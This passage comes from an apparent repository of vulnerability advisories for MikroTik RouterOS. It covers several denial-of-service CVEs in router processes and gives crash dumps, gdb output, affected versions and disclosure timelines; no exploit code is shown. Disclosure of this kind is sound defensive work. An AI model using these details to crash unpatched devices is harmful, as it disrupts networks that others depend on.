esi=0x7fe78144 ebp=0x7fe780c8 esp=0x7fe78090 18 | 2020.06.22-20:25:36.17@0: eax=0x00000000 ebx=0x776b9b40 ecx=0x0000000b edx=0xffffffff 19 | 2020.06.22-20:25:36.17@0: 20 | 2020.06.22-20:25:36.17@0: maps: 21 | 2020.06.22-20:25:36.17@0: 08048000-08051000 r-xp 00000000 00:0c 1041 /nova/bin/mactel 22 | 2020.06.22-20:25:36.17@0: 7762c000-77661000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.22-20:25:36.17@0: 77665000-7767f000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 24 | 2020.06.22-20:25:36.17@0: 77680000-7768f000 r-xp 00000000 00:0c 945 /lib/libuc++.so 25 | 2020.06.22-20:25:36.17@0: 77690000-776ad000 r-xp 00000000 00:0c 948 /lib/libucrypto.so 26 | 2020.06.22-20:25:36.17@0: 776ae000-776af000 r-xp 00000000 00:0c 967 /lib/libutil-0.9.33.2.so 27 | 2020.06.22-20:25:36.17@0: 776b1000-776b9000 r-xp 00000000 00:0c 951 /lib/libubox.so 28 | 2020.06.22-20:25:36.17@0: 776ba000-77706000 r-xp 00000000 00:0c 947 /lib/libumsg.so 29 | 2020.06.22-20:25:36.17@0: 7770c000-77713000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 30 | 2020.06.22-20:25:36.17@0: 31 | 2020.06.22-20:25:36.17@0: stack: 0x7fe79000 - 0x7fe78090 32 | 2020.06.22-20:25:36.17@0: 44 81 e7 7f 01 00 00 00 ff ff ff ff 1f d0 04 08 58 57 05 08 28 b0 70 77 01 00 00 00 00 00 00 00 33 | 2020.06.22-20:25:36.17@0: 1c 85 e7 7f 04 1d 05 08 02 db 70 77 40 9b 6b 77 40 57 05 08 44 81 e7 7f f8 80 e7 7f 7c 4a 6b 77 34 | 2020.06.22-20:25:36.17@0: 35 | 2020.06.22-20:25:36.17@0: code: 0x804ddc7 36 | 2020.06.22-20:25:36.17@0: 8b 50 2f 89 55 da 66 8b 40 33 66 89 45 de 83 c4 37 | ``` 38 | 39 | #### Affected Version 40 | 41 | This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `7.4` still suffers from this vulnerability. 42 | 43 | #### Timeline 44 | 45 | + 2020/03/06 - reported the vulnerability to the vendor 46 | + 2020/03/09 - vendor confirmed the vulnerability 47 | + 2021/05/04 - CVE was assigned 48 | 49 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20248/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20248 2 | 3 | #### Description 4 | 5 | The `memtest` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 6 | 7 | When testing the proof of concept on an x86 RouterOS VM, this vulnerability will consume all the memory, thus causing the whole system to reboot finally. 8 | 9 | Against stable `6.46.3`, the poc resulted in the high cpu load on the device. 10 | 11 | ![memtest_high_cpu_load](./images/memtest_high_cpu_load.png) 12 | 13 | #### Affected Version 14 | 15 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 16 | 17 | #### Timeline 18 | 19 | + 2020/04/20 - reported the vulnerability to the vendor 20 | + 2020/04/23 - the vendor reproduced and confirmed the vulnerability 21 | + 2021/05/04 - CVE was assigned 22 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20248/images/memtest_high_cpu_load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20248/images/memtest_high_cpu_load.png -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20249/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20249 2 | 3 | #### Description 4 | 5 | The `resolver` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `resolver` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash dump. 8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.19-10:32:37.42@0: 12 | 2020.06.19-10:32:37.42@0: 13 | 2020.06.19-10:32:37.42@0: /nova/bin/resolver 14 | 2020.06.19-10:32:37.42@0: --- signal=11 -------------------------------------------- 15 | 2020.06.19-10:32:37.42@0: 16 | 2020.06.19-10:32:37.42@0: eip=0x7774c049 eflags=0x00010212 17 | 2020.06.19-10:32:37.42@0: edi=0x080619d0 esi=0x7f8bd684 ebp=0x7f8bd5a8 esp=0x7f8bd59c 18 | 2020.06.19-10:32:37.42@0: eax=0x00000001 ebx=0x777544ec ecx=0x08061c60 edx=0x08061c60 19 | 2020.06.19-10:32:37.42@0: 20 | 2020.06.19-10:32:37.42@0: maps: 21 | 2020.06.19-10:32:37.42@0: 08048000-0805c000 r-xp 00000000 00:0c 995 /nova/bin/resolver 22 | 2020.06.19-10:32:37.42@0: 776f1000-77726000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.19-10:32:37.42@0: 7772a000-77744000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 24 | 2020.06.19-10:32:37.42@0: 77745000-77754000 r-xp 00000000 00:0c 944 /lib/libuc++.so 25 | 2020.06.19-10:32:37.42@0: 77755000-7775d000 r-xp 00000000 00:0c 950 /lib/libubox.so 26 | 2020.06.19-10:32:37.42@0: 7775e000-777aa000 r-xp 00000000 00:0c 946 /lib/libumsg.so 27 | 2020.06.19-10:32:37.42@0: 777b0000-777b7000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 28 | 2020.06.19-10:32:37.42@0: 29 | 2020.06.19-10:32:37.42@0: stack: 0x7f8be000 - 0x7f8bd59c 30 | 2020.06.19-10:32:37.42@0: 08 d6 8b 7f b4 d5 8b 7f ec d5 8b 7f c8 d5 8b 7f f1 ef 04 08 ec d5 8b 7f 60 1c 06 08 08 d6 8b 7f 31 | 2020.06.19-10:32:37.42@0: f1 16 05 08 ec d5 8b 7f 2e 00 00 00 08 d6 8b 7f 03 17 05 08 e8 71 72 77 04 d6 8b 7f 57 1b 7b 77 32 | 2020.06.19-10:32:37.42@0: 33 | 2020.06.19-10:32:37.42@0: code: 0x7774c049 34 | 2020.06.19-10:32:37.42@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8 35 | ``` 36 | 37 | #### Affected Version 38 | 39 | This vulnerability was initially found in stable `6.44.6`, and was fixed in stable `6.47`. 40 | 41 | #### Timeline 42 | 43 | + 2020/01/06 - reported the vulnerability to the vendor 44 | + 2020/01/07 - the vendor reproduced and confirmed the vulnerability 45 | + 2021/05/04 - CVE was assigned 46 | 47 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20250/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20250 2 | 3 | #### Description 4 | 5 | The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault. 11 | => 0x80562c6: mov BYTE PTR [edx+eax*1],bl 12 | 0x80562c9: mov ebx,esi 13 | 0x80562cb: mov BYTE PTR [edx+eax*1+0x1],bl 14 | 0x80562cf: mov ebx,edi 15 | 0x080562c6 in ?? () 16 | (gdb) i r 17 | eax 0x0 0 18 | ecx 0x0 0 19 | edx 0x0 0 20 | ebx 0x0 0 21 | esp 0x7fd8cb2c 0x7fd8cb2c 22 | ebp 0x7fd8cb48 0x7fd8cb48 23 | esi 0xff0000 16711680 24 | edi 0xff000000 -16777216 25 | eip 0x80562c6 0x80562c6 26 | eflags 0x10246 [ PF ZF IF RF ] 27 | cs 0x73 115 28 | ss 0x7b 123 29 | ds 0x7b 123 30 | es 0x7b 123 31 | fs 0x0 0 32 | gs 0x33 51 33 | (gdb) info inferiors 34 | Num Description Executable 35 | 1 target:/nova/bin/lcdstat 36 | * 2 process 635 target:/nova/bin/lcdstat 37 | ``` 38 | 39 | And the crash dump in `/rw/logs/backtrace.log` was: 40 | 41 | ```shell 42 | # cat /rw/logs/backtrace.log 43 | 2020.06.04-15:48:13.77@0: 44 | 2020.06.04-15:48:13.77@0: 45 | 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat 46 | 2020.06.04-15:48:13.77@0: --- signal=11 -------------------------------------------- 47 | 2020.06.04-15:48:13.77@0: 48 | 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246 49 | 2020.06.04-15:48:13.77@0: edi=0xff000000 esi=0x00ff0000 ebp=0x7fd8cb48 esp=0x7fd8cb2c 50 | 2020.06.04-15:48:13.77@0: eax=0x00000000 ebx=0x00000000 ecx=0x00000000 edx=0x00000000 51 | 2020.06.04-15:48:13.77@0: 52 | 2020.06.04-15:48:13.77@0: maps: 53 | 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat 54 | 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 55 | 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 56 | 2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp 00000000 00:0c 944 /lib/libuc++.so 57 | 2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp 00000000 00:0c 950 /lib/libubox.so 58 | 2020.06.04-15:48:13.77@0: 7772b000-77777000 r-xp 00000000 00:0c 946 /lib/libumsg.so 59 | 2020.06.04-15:48:13.77@0: 7777d000-77784000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 60 | 2020.06.04-15:48:13.77@0: 61 | 2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c 62 | 2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00 00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f 63 | 2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77 77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08 64 | 2020.06.04-15:48:13.77@0: 65 | 2020.06.04-15:48:13.77@0: code: 0x80562c6 66 | 2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02 05 67 | ``` 68 | 69 | #### Affected Version 70 | 71 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 72 | 73 | #### Timeline 74 | 75 | + 2020/03/11 - reported the vulnerability to the vendor 76 | + 2020/06/02 - the vendor fixed it in stable `6.47` 77 | + 2021/05/04 - CVE was assigned 78 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20252/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20252 2 | 3 | #### Description 4 | 5 | The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault. 11 | => 0x805b566: cmp BYTE PTR [eax+0x8],0x0 12 | 0x805b56a: jne 0x805b578 13 | 0x805b56c: push edx 14 | 0x805b56d: push edx 15 | 0x0805b566 in ?? () 16 | (gdb) i r 17 | eax 0x0 0 18 | ecx 0x807f14c 134738252 19 | edx 0x1 1 20 | ebx 0x7fc106c8 2143356616 21 | esp 0x7fc0fc70 0x7fc0fc70 22 | ebp 0x7fc0fca8 0x7fc0fca8 23 | esi 0x8085bf8 134765560 24 | edi 0x8085e70 134766192 25 | eip 0x805b566 0x805b566 26 | eflags 0x10202 [ IF RF ] 27 | cs 0x73 115 28 | ss 0x7b 123 29 | ds 0x7b 123 30 | es 0x7b 123 31 | fs 0x0 0 32 | gs 0x33 51 33 | (gdb) info inferiors 34 | Num Description Executable 35 | 1 target:/nova/bin/lcdstat 36 | * 2 process 731 target:/nova/bin/lcdstat 37 | ``` 38 | 39 | And the crash dump in `/rw/logs/backtrace.log` was: 40 | 41 | ```shell 42 | # cat /rw/logs/backtrace.log 43 | 2020.06.04-15:58:23.76@0: 44 | 2020.06.04-15:58:23.76@0: 45 | 2020.06.04-15:58:23.76@0: /nova/bin/lcdstat 46 | 2020.06.04-15:58:23.76@0: --- signal=11 -------------------------------------------- 47 | 2020.06.04-15:58:23.76@0: 48 | 2020.06.04-15:58:23.76@0: eip=0x0805b566 eflags=0x00010202 49 | 2020.06.04-15:58:23.76@0: edi=0x08085e70 esi=0x08085bf8 ebp=0x7fc0fca8 esp=0x7fc0fc70 50 | 2020.06.04-15:58:23.76@0: eax=0x00000000 ebx=0x7fc106c8 ecx=0x0807f14c edx=0x00000001 51 | 2020.06.04-15:58:23.76@0: 52 | 2020.06.04-15:58:23.76@0: maps: 53 | 2020.06.04-15:58:23.76@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat 54 | 2020.06.04-15:58:23.76@0: 77680000-776b5000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 55 | 2020.06.04-15:58:23.76@0: 776b9000-776d3000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 56 | 2020.06.04-15:58:23.76@0: 776d4000-776e3000 r-xp 00000000 00:0c 944 /lib/libuc++.so 57 | 2020.06.04-15:58:23.76@0: 776e4000-776ec000 r-xp 00000000 00:0c 950 /lib/libubox.so 58 | 2020.06.04-15:58:23.76@0: 776ed000-77739000 r-xp 00000000 00:0c 946 /lib/libumsg.so 59 | 2020.06.04-15:58:23.76@0: 7773f000-77746000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 60 | 2020.06.04-15:58:23.76@0: 61 | 2020.06.04-15:58:23.76@0: stack: 0x7fc10000 - 0x7fc0fc70 62 | 2020.06.04-15:58:23.76@0: e4 9a 73 77 58 fe c0 7f a8 fc c0 7f 00 00 00 00 58 fe c0 7f 73 00 00 00 9c fc c0 7f 22 ac 70 77 63 | 2020.06.04-15:58:23.76@0: 58 fe c0 7f 72 00 00 08 b8 fc c0 7f 5c fd c0 7f 70 5e 08 08 c8 06 c1 7f c8 fc c0 7f ab b8 05 08 64 | 2020.06.04-15:58:23.76@0: 65 | 2020.06.04-15:58:23.76@0: code: 0x805b566 66 | 2020.06.04-15:58:23.76@0: 80 78 08 00 75 0c 52 52 50 53 e8 91 e7 ff ff 83 67 | ``` 68 | 69 | #### Affected Version 70 | 71 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 72 | 73 | #### Timeline 74 | 75 | + 2020/03/11 - report the vulnerability to the vendor 76 | + 2020/06/02 - vendor fix it in stable `6.47` 77 | + 2021/05/04 - CVE was assigned 78 | 79 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20253/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20253 2 | 3 | #### Description 4 | 5 | The `lcdstat` process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to arithmetic exception. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | Thread 2.1 "lcdstat" received signal SIGFPE, Arithmetic exception. 11 | => 0x8058539: idiv ecx 12 | 0x805853b: mov DWORD PTR [ebp-0x20],eax 13 | 0x805853e: mov eax,0x1 14 | 0x8058543: shl eax,cl 15 | 0x08058539 in ?? () 16 | (gdb) i r 17 | eax 0x8 8 18 | ecx 0x0 0 19 | edx 0x0 0 20 | ebx 0x7ffff030 2147479600 21 | esp 0x7fffef50 0x7fffef50 22 | ebp 0x7fffef88 0x7fffef88 23 | esi 0x0 0 24 | edi 0x808b0c8 134787272 25 | eip 0x8058539 0x8058539 26 | eflags 0x10297 [ CF PF AF SF IF RF ] 27 | cs 0x73 115 28 | ss 0x7b 123 29 | ds 0x7b 123 30 | es 0x7b 123 31 | fs 0x0 0 32 | gs 0x33 51 33 | (gdb) info inferiors 34 | Num Description Executable 35 | 1 target:/nova/bin/lcdstat 36 | * 2 process 281 target:/nova/bin/lcdstat 37 | ``` 38 | 39 | And the crash dump in `/rw/logs/backtrace.log` was: 40 | 41 | ```shell 42 | # cat /rw/logs/backtrace.log 43 | 2020.06.04-16:17:48.62@0: 44 | 2020.06.04-16:17:48.62@0: 45 | 2020.06.04-16:17:48.62@0: /nova/bin/lcdstat 46 | 2020.06.04-16:17:48.62@0: --- signal=8 -------------------------------------------- 47 | 2020.06.04-16:17:48.62@0: 48 | 2020.06.04-16:17:48.62@0: eip=0x08058539 eflags=0x00010297 49 | 2020.06.04-16:17:48.62@0: edi=0x0808b0c8 esi=0x00000000 ebp=0x7fffef88 esp=0x7fffef50 50 | 2020.06.04-16:17:48.62@0: eax=0x00000008 ebx=0x7ffff030 ecx=0x00000000 edx=0x00000000 51 | 2020.06.04-16:17:48.62@0: 52 | 2020.06.04-16:17:48.62@0: maps: 53 | 2020.06.04-16:17:48.62@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat 54 | 2020.06.04-16:17:48.62@0: 77f38000-77f6d000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 55 | 2020.06.04-16:17:48.62@0: 77f71000-77f8b000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 56 | 2020.06.04-16:17:48.62@0: 77f8c000-77f9b000 r-xp 00000000 00:0c 944 /lib/libuc++.so 57 | 2020.06.04-16:17:48.62@0: 77f9c000-77fa4000 r-xp 00000000 00:0c 950 /lib/libubox.so 58 | 2020.06.04-16:17:48.62@0: 77fa5000-77ff1000 r-xp 00000000 00:0c 946 /lib/libumsg.so 59 | 2020.06.04-16:17:48.62@0: 77ff7000-77ffe000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 60 | 2020.06.04-16:17:48.62@0: 61 | 2020.06.04-16:17:48.62@0: stack: 0x80000000 - 0x7fffef50 62 | 2020.06.04-16:17:48.62@0: 64 ef ff 7f ec b4 f9 77 84 b2 f9 77 ec b4 f9 77 a4 ef ff 7f 01 00 00 00 00 50 00 00 00 00 00 00 63 | 2020.06.04-16:17:48.62@0: a4 ef ff 7f 74 5e 08 08 14 00 00 00 30 f0 ff 7f a4 ef ff 7f 28 f0 ff 7f e8 ef ff 7f cc 8e 05 08 64 | 2020.06.04-16:17:48.62@0: 65 | 2020.06.04-16:17:48.62@0: code: 0x8058539 66 | 2020.06.04-16:17:48.62@0: f7 f9 89 45 e0 b8 01 00 00 00 d3 e0 48 31 ff 8b 67 | ``` 68 | 69 | #### Affected Version 70 | 71 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 72 | 73 | #### Timeline 74 | 75 | + 2020/03/11 - report the vulnerability to the vendor 76 | + 2020/06/02 - vendor fix it in stable `6.47` 77 | + 2021/05/04 - CVE is assigned 78 | 79 | 80 | 81 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20254/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20254 2 | 3 | #### Description 4 | 5 | The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault. 11 | => 0x805a26e: mov esi,DWORD PTR [eax-0x4] 12 | 0x805a271: push DWORD PTR [ebx+0x78] 13 | 0x805a274: call 0x8056298 14 | 0x805a279: mov eax,DWORD PTR [esi+0x10] 15 | 0x0805a26e in ?? () 16 | (gdb) i r 17 | eax 0x0 0 18 | ecx 0x807f14c 134738252 19 | edx 0x1 1 20 | ebx 0x7fbeb848 2143205448 21 | esp 0x7fbeadf4 0x7fbeadf4 22 | ebp 0x7fbeae18 0x7fbeae18 23 | esi 0x7fbeaedc 2143203036 24 | edi 0x0 0 25 | eip 0x805a26e 0x805a26e 26 | eflags 0x10202 [ IF RF ] 27 | cs 0x73 115 28 | ss 0x7b 123 29 | ds 0x7b 123 30 | es 0x7b 123 31 | fs 0x0 0 32 | gs 0x33 51 33 | (gdb) info inferiors 34 | Num Description Executable 35 | 1 target:/nova/bin/lcdstat 36 | * 2 process 465 target:/nova/bin/lcdstat 37 | ``` 38 | 39 | And the crash dump in `/rw/logs/backtrace.log` was: 40 | 41 | ```shell 42 | # cat /rw/logs/backtrace.log 43 | 2020.06.04-15:32:04.67@0: 44 | 2020.06.04-15:32:04.67@0: 45 | 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat 46 | 2020.06.04-15:32:04.67@0: --- signal=11 -------------------------------------------- 47 | 2020.06.04-15:32:04.67@0: 48 | 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202 49 | 2020.06.04-15:32:04.67@0: edi=0x00000000 esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4 50 | 2020.06.04-15:32:04.67@0: eax=0x00000000 ebx=0x7fbeb848 ecx=0x0807f14c edx=0x00000001 51 | 2020.06.04-15:32:04.67@0: 52 | 2020.06.04-15:32:04.67@0: maps: 53 | 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat 54 | 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 55 | 2020.06.04-15:32:04.67@0: 77736000-77750000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 56 | 2020.06.04-15:32:04.67@0: 77751000-77760000 r-xp 00000000 00:0c 944 /lib/libuc++.so 57 | 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00000000 00:0c 950 /lib/libubox.so 58 | 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00000000 00:0c 946 /lib/libumsg.so 59 | 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 60 | 2020.06.04-15:32:04.67@0: 61 | 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4 62 | 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f 63 | 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f 64 | 2020.06.04-15:32:04.67@0: 65 | 2020.06.04-15:32:04.67@0: code: 0x805a26e 66 | 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4 67 | ``` 68 | 69 | #### Affected Version 70 | 71 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 72 | 73 | #### Timeline 74 | 75 | + 2020/03/11 - report the vulnerability to the vendor 76 | + 2020/06/02 - vendor fix it in stable `6.47` 77 | + 2021/05/04 - CVE is assigned 78 | 79 | 80 | 81 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20262/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20262 2 | 3 | #### Description 4 | 5 | The `ipsec` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `ipsec` process. By sending a crafted packet, an authenticated remote user can crash the `ipsec` process due to assertion failure. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGABRT, Aborted. 14 | => 0x7748155b : pop ebx 15 | 0x7748155c : cmp eax,0xfffff000 16 | 0x77481561 : jbe 0x77481571 17 | 0x77481563 : mov edx,DWORD PTR [ebx-0x34] 18 | 0x7748155b in raise () from target:/lib/libc.so.0 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x291 657 22 | edx 0x6 6 23 | ebx 0x291 657 24 | esp 0x7f8fa448 0x7f8fa448 25 | ebp 0x7f8fa450 0x7f8fa450 26 | esi 0x77489200 2001244672 27 | edi 0x1 1 28 | eip 0x7748155b 0x7748155b 29 | eflags 0x246 [ PF ZF IF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 657 target:/ram/pckg/security/nova/bin/ipsec 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-18:25:16.04@0: 46 | 2020.06.04-18:25:16.04@0: 47 | 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec 48 | 2020.06.04-18:25:16.04@0: --- signal=6 -------------------------------------------- 49 | 2020.06.04-18:25:16.04@0: 50 | 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x00000246 51 | 2020.06.04-18:25:16.04@0: edi=0x00000001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448 52 | 2020.06.04-18:25:16.04@0: eax=0x00000000 ebx=0x00000291 ecx=0x00000291 edx=0x00000006 53 | 2020.06.04-18:25:16.04@0: 54 | 2020.06.04-18:25:16.04@0: maps: 55 | 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00000000 00:11 42 /ram/pckg/security/nova/bin/ipsec 56 | 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so 60 | 2020.06.04-18:25:16.04@0: 774bb000-774d0000 r-xp 00000000 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so 61 | 2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00000000 00:0c 951 /lib/liburadius.so 62 | 2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00000000 00:0c 956 /lib/libssl.so.1.0.0 63 | 2020.06.04-18:25:16.04@0: 77528000-77530000 r-xp 00000000 00:0c 950 /lib/libubox.so 64 | 2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00000000 00:0c 946 /lib/libumsg.so 65 | 2020.06.04-18:25:16.04@0: 77580000-7759d000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 66 | 2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0 67 | 2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 68 | 2020.06.04-18:25:16.04@0: 69 | 2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448 70 | 2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00 00 00 00 00 71 | 2020.06.04-18:25:16.04@0: cc a4 8f 7f e8 a4 8f 7f 84 a4 8f 7f e4 da 57 77 01 00 00 00 e4 da 57 77 cc a4 8f 7f 01 00 00 00 72 | 2020.06.04-18:25:16.04@0: 73 | 2020.06.04-18:25:16.04@0: code: 0x7748155b 74 | 2020.06.04-18:25:16.04@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 75 | ``` 76 | 77 | #### Affected Version 78 | 79 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 80 | 81 | #### Timeline 82 | 83 | + 2020/01/06 - report the vulnerability to the vendor 84 | + 2020/06/02 - vendor fix it in stable `6.47` 85 | + 2021/05/04 - CVE is assigned 86 | 87 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20264/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20264 2 | 3 | #### Description 4 | 5 | The `netwatch` process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the `netwatch` process due to arithmetic exception. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGFPE, Arithmetic exception. 14 | => 0x804c6d7: div esi 15 | 0x804c6d9: mov edx,DWORD PTR [ebx+0x30] 16 | 0x804c6dc: cmp edx,eax 17 | 0x804c6de: jae 0x804c74e 18 | 0x0804c6d7 in ?? () 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x0 0 22 | edx 0x0 0 23 | ebx 0x8051020 134549536 24 | esp 0x7ffff3b0 0x7ffff3b0 25 | ebp 0x7ffff3f8 0x7ffff3f8 26 | esi 0x0 0 27 | edi 0x5ed9208c 1591287948 28 | eip 0x804c6d7 0x804c6d7 29 | eflags 0x10246 [ PF ZF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 